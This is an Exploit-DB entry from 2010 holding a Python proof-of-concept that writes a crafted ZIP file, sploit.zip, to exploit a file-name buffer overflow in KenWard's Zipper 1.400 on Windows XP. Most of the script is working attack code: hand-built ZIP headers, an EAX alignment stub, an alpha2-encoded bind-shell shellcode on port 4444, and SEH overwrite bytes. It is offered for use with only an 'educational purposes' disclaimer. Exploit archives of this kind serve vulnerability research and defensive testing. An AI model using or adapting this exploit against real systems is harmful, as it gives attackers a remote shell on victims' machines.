KenWard's Zipper 1.400 - Local Buffer Overflow (2)

EDB-ID:

11872

CVE:


EDB Verified:

Author:

sinn3r

Type:

local

Exploit:   /  

Platform:

Windows

Date:

2010-03-25

Vulnerable App: 
#!/usr/bin/python

## KenWard's Zipper v1.400 File Name Buffer Overflow
## Coded by sinn3r  (x90.sinner{at}gmail{d0t}com)
## Tested on: Windows XP SP3 ENG
## Reference: http://www.exploit-db.com/exploits/11834
## Big thanks to mr_me, and corelanc0d3r.
## greetz to all the friends at Corelan Scurity Team & Exploit-DB... coolest people ever!
##
## Description:
## This exploit takes advantage of the fact too many characters get mangled, as a result
## I was able to get a shell in a more straight forward way.  Very interesting exercise.
## Mr_me and tecR0c figured out this trick, of course.  But I was given the honor to share it.

## Script provided 'as is', without any warranty.
## Use for educational purposes only.  Do not use this code to do anything illegal.

## Zip file format based on:
## http://en.wikipedia.org/wiki/ZIP_(file_format)
local_file_header = (
"\x50\x4B\x03\x04" 	#Local file header signature
"\x00\x02"		#Version needed to extract
"\x00\x08"		#General purpose bit flag
"\x00\xDA"		#Compression method
"\xA2\x48"		#File last modification time
"\x3B\xF6"		#File last modification date
"\x66\x18\x0D\x4E"	#CRC-32
"\xEF\x0F\x00\x00"	#Compressed size (payload size)
"\x14\x00\x00\x00"	#Uncompressed size
"\xe4\x4f"		#File name length
"\x04\x00"		#Extra field length
#"\x73\x65\x63\x72\x65\x74\x73"	#File name (n) ASCII "secrets"
#"\x42\x42\x42\x42"	#Extra field (m)
);

central_directory_file_header = (
"\x50\x4b\x01\x02"	#Central directory file header signature
"\x14\x00"		#Version made by
"\x14\x00"		#Version needed to extract
"\x00\x08"		#General purpose bit flag
"\x00\xDA"		#Compression method
"\xA2\x48"		#File last modification time
"\x3B\xF6"		#File last modification date
"\x66\x18\x0D\x4E"	#CRC-32
"\xE4\x0F\x00\x00"	#Compressed size (payload size)
"\x14\x00\x00\x00"	#Uncompressed size
"\xe4\x0f"		#File name length (n)
"\x04\x00"		#Extra field length (m)
"\x04\x00"		#File comment length
"\x00\x01"		#Disk number where file starts
"\x00\x00"		#Internal file attributes
"\x20\x00\x00\x00"	#External file attributes
"\x00\x00\x00\x00"	#Relative offset of local file header
#"\x73\x65\x63\x72\x65\x74\x73"	#File name (n) ASCII "secrets"
#"\x42\x42\x42\x42"	#Extra field (m)
#"\x43\x43\x43\x43"	#File comment (k)
);

end_of_central_directory_record = (
"\x50\x4B\x05\x06"	#End of central directory signature
"\x00\x00"		#Number of this disk
"\x00\x00"		#Disk where central directory starts
"\x01\x00"		#Number of central directory records on this disk
"\x01\x00"		#Total number of central directory records
"\x12\x10\x00\x00"	#Size of central directory (central directory size + payload)
"\x02\x10\x00\x00"	#Offset of start of central directory, relative to start of archive (lfh + payload)
"\x00\x00"		#Zip file comment length (n)
);


## Align EAX for the base address of the alpha2 encoded bindshell
alignEAX = (
"\x05\x10\x7E\x10\x7E"	#ADD EAX, 0x7E107E10
"\x05\x09\x75\x01\x7E"	#ADD EAX, 0x7E017509
"\x05\x02\x03\x01\x04"	#ADD EAX, 0x04010302
"\x72\x07"+		#JB jump over the bytes we can't overwrite
"\x41"*12		#NOPs
);

## windows/shell_bind_tcp lport=4444 exitfunc=seh
## alpha2 eax --uppercase   744 bytes
shellcode = ("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLZHMYEP5PS03PK"
"9ZE6QN2CTLK0RVPLKPR4LLKQBTTLKSBVH4ONWQZVFFQKOFQO0NLGL3QSL4BVLQ0YQXO4MUQIWKRJPF2QGLKPRB0"
"LKPBGLEQ8PLK70RXMUO0BTQZEQHPPPLK78TXLK687PS1XSM37LPILKWDLKUQ8V6QKO6QYPNL9Q8OTMEQ9WFXKPT"
"5ZT33SMJX7KCM14CEZB1HLKPXWTUQN3SVLKTLPKLKV85LEQXSLK34LKS1HPK9W47TQ4QK1KSQQI0Z0QKOM0PXQO"
"QJLKTRJKK61MSXVS02EP5PCXBW3CFRQOF4SXPLT77VDGKO9EX8LPS1UPS0WYO4F4PP3X7YMP2KS0KOHUV00P0P6"
"0QPV01PPPRHJJTOIOKPKON5MYO7FQYK0SSXS2S0TQQLMYKVSZB0PVPW3XO2YK7GCWKO8UPSPWE8X7KYWHKOKOHU"
"QCV3PWSX2TJLGKKQKON5V7MYHG58BU2N0M3QKON52HRCBM54UPMYKS0W67676QL62JTRPYPVKRKMSVO774WTWLU"
"QUQLM0DGTB0O65PPD0TV0PV0V0VQVPVPNPV1FQC66SXT9XLWOLFKOYEK9M0PNV6QVKOFPCXUXK75MSPKON5OKKN"
"TNP2ZJBHY6LUOMMMKON5WLUV3L5ZK0KKKPRUC5OKW74S2R2ORJ5PPSKO8UUZA")

## 4064+4 bytes
## Pointer to next SEH record: 1022 bytes
## SE handler                : 1026 bytes
payload = (
"\x41"*(1017-len(alignEAX)-len(shellcode))+	#Padding
alignEAX+					#Align EAX for the bindshell
shellcode+					#Bindshell lport 4444
"\x82\x85\x81\x98\x98"				#This will get mangled and become "\xE9\xE0\xFC\xFF\xFF"
"\x73\x97\x42\x42"				#JNB 0x97 = JNB 0xF9 = Same as EB 0xFB = Rewind 5 bytes
"\x7E\x27\x41\x00"+				#POP POP RET = 0x0041277E
"\x44"*3034+					#Padding
".bin"						#Fake name
);

## Create the ZIP structure with our payload
zip = (
local_file_header +
payload +
central_directory_file_header +
payload +
end_of_central_directory_record
);

f = open("sploit.zip", "w")
f.write(zip)
f.close()

print "[*] Local file header size = 0x%x" %len(local_file_header)
print "[*] Central directory file header size = 0x%x" %len(central_directory_file_header)
print "[*] End of central directory record size = 0x%x" %len(end_of_central_directory_record)
print "[*] Payload size = %s bytes" %len(payload)
print "[*] sploit.zip created.  Open it with KenWard's Zipper."
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services